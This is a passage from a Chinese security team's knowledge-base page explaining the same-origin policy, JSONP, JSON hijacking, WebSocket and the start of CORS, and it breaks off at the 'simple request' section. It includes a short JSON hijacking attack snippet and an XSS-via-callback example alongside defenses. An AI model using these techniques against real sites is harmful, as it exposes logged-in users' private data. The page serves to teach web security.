<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>同源策略和域安全 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/79.c4e9a4f2.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>Web安全</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/web/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/web/unauthorized.html" title="未授权访问总结" class="sidebar-link">未授权访问总结</a></li><li><a href="/knowledge/web/infoleak.html" title="信息泄露漏洞" class="sidebar-link">信息泄露漏洞</a></li><li><a href="/knowledge/web/fileuploads.html" title="文件上传漏洞" class="sidebar-link">文件上传漏洞</a></li><li><a href="/knowledge/web/fileincludes.html" title="文件包含漏洞" class="sidebar-link">文件包含漏洞</a></li><li><a href="/knowledge/web/cmd_injection.html" title="命令注入漏洞" class="sidebar-link">命令注入漏洞</a></li><li><a href="/knowledge/web/logical.html" title="常见逻辑漏洞" class="sidebar-link">常见逻辑漏洞</a></li><li><a href="/knowledge/web/csrf-ssrf.html" title="请求伪造漏洞" class="sidebar-link">请求伪造漏洞</a></li><li><a href="/knowledge/web/same-origin-policy.html" aria-current="page" title="同源策略和域安全" class="active sidebar-link">同源策略和域安全</a></li><li><a href="/knowledge/web/xss.html" title="XSS 跨站脚本漏洞" class="sidebar-link">XSS 跨站脚本漏洞</a></li><li><a href="/knowledge/web/xxe.html" title="XML实体注入漏洞" class="sidebar-link">XML实体注入漏洞</a></li><li><a href="/knowledge/web/sql_injection.html" title="SQL注入漏洞" class="sidebar-link">SQL注入漏洞</a></li><li><a href="/knowledge/web/mysql-write-shell.html" title="MySQL写shell" class="sidebar-link">MySQL写shell</a></li><li><a href="/knowledge/web/websocket-sec.html" title="WebSocket安全问题分析" class="sidebar-link">WebSocket安全问题分析</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h2 id="同源策略">同源策略 <a href="#同源策略" class="header-anchor">#</a></h2> <p>同源策略是目前所有浏览器都实行的一种安全政策。</p> <p>A网页设置的 Cookie，B网页不能打开，除非这两个网页同源。</p> <p>所谓同源，是指：</p> <p><strong>两个网页，协议(protocol)、端口(port)、和主机(host)都相同.</strong></p> <p>如果非同源，以下三种行为受到限制：</p> <blockquote><p>（1） Cookie、<code>LocalStorage</code> 和 <code>IndexDB</code> 无法读取。</p> <p>（2） DOM 无法获得。</p> <p>（3） AJAX 请求不能发送。</p></blockquote> <p><strong>同源策略，哪些东西是同源可以获取到的？</strong></p> <blockquote><p><code>cookie：</code> 服务器写入浏览器的一小段信息，只有同源的网页才能共享</p> <p><code>DOM：</code> 	如果两个网页不同源，就无法拿到对方的DOM ； 典型的例子是<code>iframe</code>窗口和<code>window.open</code>方法打开的窗口，它们与父窗口无法通信</p></blockquote> <p><strong>如果子域名和顶级域名不同源，在哪里可以设置叫他们同源？</strong></p> <p>两个网页一级域名相同，只是二级域名不同，浏览器允许通过设置<code>document.domain</code>属性共享 Cookie，拿到DOM等。</p> <p>在根域范围内，可以 把domain属性的值设置为它的上一级域 ；</p> <div class="language-js line-numbers-mode"><pre class="language-js"><code><span class="token comment">// 对于文档 www.example.com/good.html,</span>
document<span class="token punctuation">.</span>domain <span class="token operator">=</span> <span class="token string">&quot;example.com&quot;</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> domain <span class="token operator">=</span> document<span class="token punctuation">.</span>domain<span class="token punctuation">;</span>
<span class="token comment">//上边的写法是正确的</span>
<span class="token comment">//但不能设置为 &quot;example.com&quot; 或者&quot;example.org&quot;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>Ajax是否遵循同源策略？</strong></p> <p>同源政策规定，AJAX请求只能发给同源的网址，否则就报错</p> <p><strong>不同浏览器之间，安全策略有哪些不同？比如chrome，firefox，IE</strong></p> <p>当涉及到同源策略时，Internet Explorer 有两个主要的不同点</p> <ul><li><strong>授信范围</strong>（Trust Zones）：两个相互之间高度互信的域名，如公司域名（corporate domains），不遵守同源策略的限制。</li> <li><strong>端口</strong>：IE 未将端口号加入到同源策略的组成部分之中，</li> <li>因此 <code>http://company.com:81/index.html</code> 和 <code>http://company.com/index.html</code>  属于同源并且不受任何限制</li></ul> <p><strong>如何规避同源策略？</strong></p> <blockquote><ul><li>以下三种方法可以规避同源策略的限制</li> <li>JSONP</li> <li>CORS</li> <li>WebSocket</li></ul></blockquote> <h2 id="jsonp">JSONP <a href="#jsonp" class="header-anchor">#</a></h2> <p><code>JSONP</code>是服务器与客户端跨源通信的常用方法</p> <p><code>JSON with Padding</code>，填充式<code>JSON</code>或者说是参数式<code>JSON</code></p> <p><code>JSONP</code>原理就是动态插入带有<code>跨域url</code>的<code>&lt;script&gt;</code>标签，然后调用回调函数</p> <p><strong>基本语法如下</strong>：</p> <div class="language-json line-numbers-mode"><pre class="language-json"><code>callback(<span class="token punctuation">{</span> <span class="token property">&quot;name&quot;</span><span class="token operator">:</span> <span class="token string">&quot;wintrysec&quot;</span> <span class="token punctuation">,</span> <span class="token property">&quot;msg&quot;</span><span class="token operator">:</span> <span class="token string">&quot;获取成功&quot;</span> <span class="token punctuation">}</span>);
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong><code>JSONP</code>两部分组成：回调函数和里面的数据。</strong>
回调函数是当响应到来时，应该在页面中调用的函数，一般是在发送过去的请求中指定</p> <p>向服务器请求<code>JSON</code>数据，这种做法不受同源政策限制；服务器收到请求后，将数据放在一个指定名字的回调函数里传回来</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token keyword">function</span> <span class="token function">addScriptTag</span><span class="token punctuation">(</span><span class="token parameter">src</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">var</span> script <span class="token operator">=</span> document<span class="token punctuation">.</span><span class="token function">createElement</span><span class="token punctuation">(</span><span class="token string">'script'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  script<span class="token punctuation">.</span><span class="token function">setAttribute</span><span class="token punctuation">(</span><span class="token string">&quot;type&quot;</span><span class="token punctuation">,</span><span class="token string">&quot;text/javascript&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  script<span class="token punctuation">.</span>src <span class="token operator">=</span> src<span class="token punctuation">;</span>
  document<span class="token punctuation">.</span>body<span class="token punctuation">.</span><span class="token function">appendChild</span><span class="token punctuation">(</span>script<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

window<span class="token punctuation">.</span><span class="token function-variable function">onload</span> <span class="token operator">=</span> <span class="token keyword">function</span> <span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token function">addScriptTag</span><span class="token punctuation">(</span><span class="token string">'http://example.com/ip?callback=foo'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

<span class="token keyword">function</span> <span class="token function">foo</span><span class="token punctuation">(</span><span class="token parameter">data</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span><span class="token string">'Your public IP address is: '</span> <span class="token operator">+</span> data<span class="token punctuation">.</span>ip<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
<span class="token comment">//该请求的查询字符串有一个callback参数，用来指定回调函数的名字，这对于JSONP是必需的</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br></div></div><p>服务器收到这个请求以后，会将数据放在回调函数的参数位置返回</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token function">foo</span><span class="token punctuation">(</span><span class="token punctuation">{</span>
  <span class="token string">&quot;ip&quot;</span><span class="token operator">:</span> <span class="token string">&quot;8.8.8.8&quot;</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>由于<code>&lt;script&gt;</code>元素请求的脚本，直接作为代码运行。</p> <p>这时，只要浏览器定义了<code>foo</code>函数，该函数就会立即调用。</p> <p>作为参数的<code>JSON</code>数据被视为JavaScript对象，而不是字符串，因此避免了使用<code>JSON.parse</code>的步骤</p> <h3 id="jsonp的劫持">JSONP的劫持 <a href="#jsonp的劫持" class="header-anchor">#</a></h3> <p><code>JSON</code> 劫持又为 <code>JSON Hijacking</code> ，这个问题属于 <code>CSRF</code> 攻击范畴。
当某网站通过 <code>JSONP</code> 的方式来跨域（一般为子域）传递用户认证后的敏感信息时
攻击者可以构造恶意的 <code>JSONP</code> 调用页面，诱导被攻击者访问，来达到截取用户敏感信息的目的</p> <p>一个典型的 <code>JSON Hijacking</code> 攻击代码(<code>wooyun</code>)：</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code> <span class="token operator">&lt;</span>script<span class="token operator">&gt;</span>
 <span class="token keyword">function</span> <span class="token function">wooyun</span><span class="token punctuation">(</span><span class="token parameter">v</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
   <span class="token function">alert</span><span class="token punctuation">(</span>v<span class="token punctuation">.</span>username<span class="token punctuation">)</span><span class="token punctuation">;</span>
 <span class="token punctuation">}</span>
 <span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>
 <span class="token operator">&lt;</span>script src<span class="token operator">=</span><span class="token string">&quot;http:/xx.cn/?o=sso&amp;m=info&amp;func=wooyun&quot;</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>当被攻击者在登陆 360 网站的情况下访问了该网页时，那么用户的隐私数据（如用户名，邮箱等）可能被攻击者劫持</p> <h3 id="jsonp防御">JSONP防御 <a href="#jsonp防御" class="header-anchor">#</a></h3> <p><strong>1. 验证 <code>JSON</code> 文件调用的来源 <code>Referer</code></strong></p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code> <span class="token operator">&lt;</span>script<span class="token operator">&gt;</span> 远程加载 <span class="token constant">JSON</span> 文件时会发送 Referer 
 在网站输出 <span class="token constant">JSON</span> 数据时判断 Referer 是不是白名单合法的，就可以进行防御
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>2.随机 token</strong></p> <p>存在reference伪造(qq.com.evil.com)、空reference、暴力穷举等问题</p> <p><a href="https://www.cnblogs.com/subsir/articles/2574670.html" target="_blank" rel="noopener noreferrer">强大的PHP伪造IP头、Cookies、Reference<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>最有效的方式还是 综合防御(判断reference和添加随机字串)，或使用加在<code>url</code>中的token可以完美解决
但是只要在该网站上出现一个 <code>XSS</code> 漏洞，那么利用这个 <code>XSS</code> 漏洞可能让你的防御体系瞬间崩溃</p> <p><strong>3.<code>callback</code>函数可定义的安全问题</strong>
callback函数的名称可以自定义，而输出环境又是<code>js</code>环境，如果没有严格过滤或审查，可以引起很多其他的攻击方式。</p> <p>比如后台使用<code>$callback = $_GET['callback'];print $callback.(data);</code>
这样子，认为callback是可信的，而攻击者完全可以将<code>alert(/xss/)</code>作为callback参数传递进去。</p> <p><strong>这种问题有两种解决方案：</strong></p> <p><strong>(1) 严格定义 <code>Content-Type: application / json</code></strong>
这样的防御机制导致了浏览器不解析恶意插入的 <code>XSS</code> 代码</p> <p><strong>(2 )过滤 callback 以及 <code>JSON</code> 数据输出</strong>
这样的防御机制是比较传统的攻防思维，对输出点进行 <code>xss</code> 过滤</p> <h2 id="websocket">WebSocket <a href="#websocket" class="header-anchor">#</a></h2> <p><code>WebSocket</code>是一种通信协议，使用<code>ws://</code>（非加密）和<code>wss://</code>（加密）作为协议前缀。</p> <p>该协议不实行同源政策，只要服务器支持，就可以通过它进行跨源通信。</p> <p><strong>为什么？</strong></p> <p><code>WebSocket</code>请求的头信息中有一个字段是<code>Origin</code>，表示该请求的请求源（origin），即发自哪个域名。</p> <p>正是因为有了<code>Origin</code>这个字段，所以<code>WebSocket</code>才没有实行同源政策。</p> <p>因为服务器可以根据这个字段，判断是否许可本次通信。</p> <h2 id="cors-重点">CORS(重点) <a href="#cors-重点" class="header-anchor">#</a></h2> <p><code>CORS</code>是跨域资源共享（Cross-Origin Resource Sharing）的缩写。</p> <p>它允许浏览器向跨源服务器，发出<a href="http://www.ruanyifeng.com/blog/2012/09/xmlhttprequest_level_2.html" target="_blank" rel="noopener noreferrer"><code>XMLHttpRequest</code><span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>请求，从而克服了AJAX只能<a href="http://www.ruanyifeng.com/blog/2016/04/same-origin-policy.html" target="_blank" rel="noopener noreferrer">同源<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>使用的限制</p> <p>它是<code>W3C</code>标准，是跨源AJAX请求的根本解决方法。</p> <p><code>CORS</code>请求大致和<code>ajax</code>请求类似，但是在HTTP头信息中加上了Origin字段表明请求来自哪个源。</p> <p>如果<code>orgin</code>是许可范围之内的话，服务器返回的响应会多出<code>Access-Control-Allow-*</code>的字段</p> <h3 id="简单请求">简单请求 <a href="#简单请求" class="header-anchor">#</a></h3> <p>只要同时满足以下两大条件，就属于简单请求。
